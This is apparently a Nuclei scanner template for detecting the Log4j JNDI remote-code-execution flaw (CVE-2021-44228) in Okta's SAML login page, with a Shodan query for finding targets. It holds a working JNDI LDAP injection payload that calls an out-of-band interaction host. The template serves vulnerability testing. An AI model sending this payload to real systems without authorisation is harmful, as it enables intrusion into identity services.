2023-10-18 20:00:15 +00:00
id : okta-log4j-rce
info :
name : Okta - Remote Code Execution (Apache Log4j)
2023-10-19 07:28:29 +00:00
author : shaikhyaser
2023-10-18 20:00:15 +00:00
severity : critical
description : |
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
reference :
- https://sec.okta.com/articles/2021/12/log4shell
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10
cve-id : CVE-2021-44228
cwe-id : CWE-77
metadata :
max-request : 1
2023-10-23 12:22:20 +00:00
shodan-query : title:"Okta"
2023-10-18 20:00:15 +00:00
tags : cve,cve2021,rce,jndi,log4j,okta,oast,kev
variables :
rand1 : '{{rand_int(111, 999)}}'
rand2 : '{{rand_int(111, 999)}}'
2023-10-19 07:28:29 +00:00
str : "{{rand_base(5)}}"
2023-10-18 20:00:15 +00:00
http :
- raw :
- |
2023-10-19 07:28:29 +00:00
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
2023-10-18 20:00:15 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2023-11-09 09:14:13 +00:00
part : interactsh_protocol # Confirms the DNS Interaction
2023-10-18 20:00:15 +00:00
words :
- "dns"
- type : regex
part : interactsh_request
regex :
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-10-18 20:00:15 +00:00
extractors :
- type : kval
kval :
2023-11-09 09:14:13 +00:00
- interactsh_ip # Print remote interaction IP in output
2023-10-18 20:00:15 +00:00
- type : regex
group : 2
regex :
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
2023-10-18 20:00:15 +00:00
part : interactsh_request
- type : regex
group : 1
regex :
2023-11-09 09:14:13 +00:00
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
2023-10-18 20:00:15 +00:00
part : interactsh_request
2023-10-23 12:51:13 +00:00
# digest: 4b0a00483046022100bc882474f76134d6af0f7b38c9d20cbb5d3917f7460342c741912ed616dcbc07022100cb71c9543aafc358c92566c24ea9387e18e8c1f88b6a33d1d4db42e2df7c8ec0:922c64590222798bb761d5b6d8e72950